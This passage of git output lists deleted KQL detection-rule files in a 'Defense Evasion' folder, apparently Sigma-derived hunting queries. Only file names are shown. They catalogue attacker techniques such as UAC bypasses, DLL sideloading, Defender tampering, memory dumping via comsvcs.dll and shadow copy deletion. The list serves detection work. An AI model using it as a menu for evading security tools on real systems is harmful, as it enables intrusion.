Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql delete mode 100644 Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql delete mode 100644 Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql delete mode 100644 Defense Evasion/Potential_Qakbot_Registry_Activity.kql delete mode 100644 Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql delete mode 100644 Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql delete mode 100644 Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql delete mode 100644 Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql delete mode 100644 Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql delete mode 100644 Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql delete mode 100644 Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql delete mode 100644 Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql delete mode 100644 Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql delete mode 100644 Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql delete mode 100644 Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql delete mode 100644 Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql delete mode 100644 Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql delete mode 100644 Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql delete mode 100644 Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql delete mode 100644 Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql delete mode 100644 Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_WWlib.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql delete mode 100644 Defense Evasion/Potential_Winnti_Dropper_Activity.kql delete mode 100644 Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql delete mode 100644 Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql delete mode 100644 Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql delete mode 100644 Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql delete mode 100644 Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql delete mode 100644 Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql delete mode 100644 Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql delete mode 100644 Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql delete mode 100644 Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql delete mode 100644 Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql delete mode 100644 Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql delete mode 100644 Defense Evasion/Powershell_Defender_Exclusion.kql delete mode 100644 Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql delete mode 100644 Defense Evasion/Powerup_Write_Hijack_DLL.kql delete mode 100644 Defense Evasion/Prefetch_File_Deleted.kql delete mode 100644 Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql delete mode 100644 Defense Evasion/Procdump_Execution.kql delete mode 100644 Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql delete mode 100644 Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql delete mode 100644 Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql delete mode 100644 Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql delete mode 100644 Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql delete mode 100644 Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql delete mode 100644 Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql delete mode 100644 Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql delete mode 100644 Defense Evasion/Pubprn.vbs_Proxy_Execution.kql delete mode 100644 Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql delete mode 100644 Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql delete mode 100644 Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/RDP_Sensitive_Settings_Changed.kql delete mode 100644 Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql delete mode 100644 Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql delete mode 100644 Defense Evasion/Raccine_Uninstall.kql delete mode 100644 Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql delete mode 100644 Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql delete mode 100644 Defense Evasion/Reg_Add_Suspicious_Paths.kql delete mode 100644 Defense Evasion/Registry_Explorer_Policy_Modification.kql delete mode 100644 Defense Evasion/Registry_Hide_Function_from_User.kql delete mode 100644 Defense Evasion/Registry_Modification_Via_Regini.EXE.kql delete mode 100644 Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql delete mode 100644 Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql delete mode 100644 Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql delete mode 100644 Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql delete mode 100644 Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql delete mode 100644 Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql delete mode 100644 Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql delete mode 100644 Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql delete mode 100644 Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql delete mode 100644 Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql delete mode 100644 Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql delete mode 100644 Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql delete mode 100644 Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql delete mode 100644 Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql delete mode 100644 Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql delete mode 100644 Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_CURL.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_CreateDump_Utility_Execution.kql delete mode 100644 Defense Evasion/Renamed_FTP.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_Jusched.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_Mavinject.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_MegaSync_Execution.kql delete mode 100644 Defense Evasion/Renamed_Msdt.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_NirCmd.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_Office_Binary_Execution.kql delete mode 100644 Defense Evasion/Renamed_PingCastle_Binary_Execution.kql delete mode 100644 Defense Evasion/Renamed_Plink_Execution.kql delete mode 100644 Defense Evasion/Renamed_ProcDump_Execution.kql delete mode 100644 Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql delete mode 100644 Defense Evasion/Renamed_Vmnat.exe_Execution.kql delete mode 100644 Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql delete mode 100644 Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql delete mode 100644 Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql delete mode 100644 Defense Evasion/RunDLL32_Spawning_Explorer.kql delete mode 100644 Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql delete mode 100644 Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql delete mode 100644 Defense Evasion/Run_PowerShell_Script_from_ADS.kql delete mode 100644 Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql delete mode 100644 Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql delete mode 100644 Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql delete mode 100644 Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql delete mode 100644 Defense Evasion/Rundll32_Internet_Connection.kql delete mode 100644 Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql delete mode 100644 Defense Evasion/Rundll32_UNC_Path_Execution.kql delete mode 100644 Defense Evasion/SCR_File_Write_Event.kql delete mode 100644 Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql delete mode 100644 Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/ScreenSaver_Registry_Key_Set.kql delete mode 100644 Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql delete mode 100644 Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql delete mode 100644 Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql delete mode 100644 Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql delete mode 100644 Defense Evasion/Service_Binary_in_Suspicious_Folder.kql delete mode 100644 Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql delete mode 100644 Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql delete mode 100644 Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql delete mode 100644 Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql delete mode 100644 Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql delete mode 100644 Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql delete mode 100644 Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql delete mode 100644 Defense Evasion/ShimCache_Flush.kql delete mode 100644 Defense Evasion/Sideloading_Link.EXE.kql delete mode 100644 Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql delete mode 100644 Defense Evasion/Suspect_Svchost_Activity.kql delete mode 100644 Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql delete mode 100644 Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql delete mode 100644 Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Calculator_Usage.kql delete mode 100644 Defense Evasion/Suspicious_Call_by_Ordinal.kql delete mode 100644 Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql delete mode 100644 Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql delete mode 100644 Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql delete mode 100644 Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql delete mode 100644 Defense Evasion/Suspicious_Creation_with_Colorcpl.kql delete mode 100644 Defense Evasion/Suspicious_Csi.exe_Usage.kql delete mode 100644 Defense Evasion/Suspicious_CustomShellHost_Execution.kql delete mode 100644 Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Double_Extension_Files.kql delete mode 100644 Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql delete mode 100644 Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql delete mode 100644 Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_DumpMinitool_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql delete mode 100644 Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql delete mode 100644 Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql delete mode 100644 Defense Evasion/Suspicious_Executable_File_Creation.kql delete mode 100644 Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql delete mode 100644 Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql delete mode 100644 Defense Evasion/Suspicious_Extexport_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql delete mode 100644 Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql delete mode 100644 Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql delete mode 100644 Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql delete mode 100644 Defense Evasion/Suspicious_GUP_Usage.kql delete mode 100644 Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql delete mode 100644 Defense Evasion/Suspicious_HH.EXE_Execution.kql delete mode 100644 Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql delete mode 100644 Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql delete mode 100644 Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql delete mode 100644 Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql delete mode 100644 Defense Evasion/Suspicious_MSDT_Parent_Process.kql delete mode 100644 Defense Evasion/Suspicious_MSHTA_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql delete mode 100644 Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql delete mode 100644 Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql delete mode 100644 Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql delete mode 100644 Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql delete mode 100644 Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql delete mode 100644 Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql delete mode 100644 Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql delete mode 100644 Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql delete mode 100644 Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql delete mode 100644 Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Defense Evasion/Suspicious_Process_Parents.kql delete mode 100644 Defense Evasion/Suspicious_Process_Start_Locations.kql delete mode 100644 Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_RASdial_Activity.kql delete mode 100644 Defense Evasion/Suspicious_Recursive_Takeown.kql delete mode 100644 Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql delete mode 100644 Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql delete mode 100644 Defense Evasion/Suspicious_Runscripthelper.exe.kql delete mode 100644 Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql delete mode 100644 Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql delete mode 100644 Defense Evasion/Suspicious_Service_Binary_Directory.kql delete mode 100644 Defense Evasion/Suspicious_Service_Installed.kql delete mode 100644 Defense Evasion/Suspicious_Sigverif_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Splwow64_Without_Params.kql delete mode 100644 Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql delete mode 100644 Defense Evasion/Suspicious_Userinit_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql delete mode 100644 Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql delete mode 100644 Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql delete mode 100644 Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql delete mode 100644 Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql delete mode 100644 Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Service_Tampering.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql delete mode 100644 Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql delete mode 100644 Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql delete mode 100644 Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql delete mode 100644 Defense Evasion/Suspicious_ZipExec_Execution.kql delete mode 100644 Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql delete mode 100644 Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql delete mode 100644 Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql delete mode 100644 Defense Evasion/Sysmon_Configuration_Update.kql delete mode 100644 Defense Evasion/Sysmon_Driver_Altitude_Change.kql delete mode 100644 Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql delete mode 100644 Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql delete mode 100644 Defense Evasion/System_File_Execution_Location_Anomaly.kql delete mode 100644 Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql delete mode 100644 Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql delete mode 100644 Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql delete mode 100644 Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql delete mode 100644 Defense Evasion/Tasks_Folder_Evasion.kql delete mode 100644 Defense Evasion/TeamViewer_Log_File_Deleted.kql delete mode 100644 Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql delete mode 100644 Defense Evasion/Third_Party_Software_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql delete mode 100644 Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql delete mode 100644 Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql delete mode 100644 Defense Evasion/Trust_Access_Disable_For_VBApplications.kql delete mode 100644 Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql delete mode 100644 Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql delete mode 100644 Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_DismHost.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_EventVwr.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql delete mode 100644 Defense Evasion/UAC_Bypass_Via_Wsreset.kql delete mode 100644 Defense Evasion/UAC_Bypass_WSReset.kql delete mode 100644 Defense Evasion/UAC_Bypass_With_Fake_DLL.kql delete mode 100644 Defense Evasion/UAC_Bypass_via_Event_Viewer.kql delete mode 100644 Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql delete mode 100644 Defense Evasion/UAC_Bypass_via_Sdclt.kql delete mode 100644 Defense Evasion/UAC_Disabled.kql delete mode 100644 Defense Evasion/UAC_Notification_Disabled.kql delete mode 100644 Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql delete mode 100644 Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql delete mode 100644 Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql delete mode 100644 Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql delete mode 100644 Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql delete mode 100644 Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql delete mode 100644 Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql delete mode 100644 Defense Evasion/Uncommon_Svchost_Parent_Process.kql delete mode 100644 Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql delete mode 100644 Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql delete mode 100644 Defense Evasion/Uninstall_Sysinternals_Sysmon.kql delete mode 100644 Defense Evasion/Unmount_Share_Via_Net.EXE.kql delete mode 100644 Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql delete mode 100644 Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql delete mode 100644 Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql delete mode 100644 Defense Evasion/Use_NTFS_Short_Name_in_Image.kql delete mode 100644 Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql delete mode 100644 Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql delete mode 100644 Defense Evasion/Use_Short_Name_Path_in_Image.kql delete mode 100644 Defense Evasion/Use_of_Remote.exe.kql delete mode 100644 Defense Evasion/Use_of_Scriptrunner.exe.kql delete mode 100644 Defense Evasion/Use_of_Setres.exe.kql delete mode 100644 Defense Evasion/Use_of_TTDInject.exe.kql delete mode 100644 Defense Evasion/Use_of_VSIISExeLauncher.exe.kql delete mode 100644 Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql delete mode 100644 Defense Evasion/Use_of_Wfc.exe.kql delete mode 100644 Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql delete mode 100644 Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql delete mode 100644 Defense Evasion/Verclsid.exe_Runs_COM_Object.kql delete mode 100644 Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql delete mode 100644 Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql delete mode 100644 Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql delete mode 100644 Defense Evasion/WMIC_Loading_Scripting_Libraries.kql delete mode 100644 Defense Evasion/WSL_Child_Process_Anomaly.kql delete mode 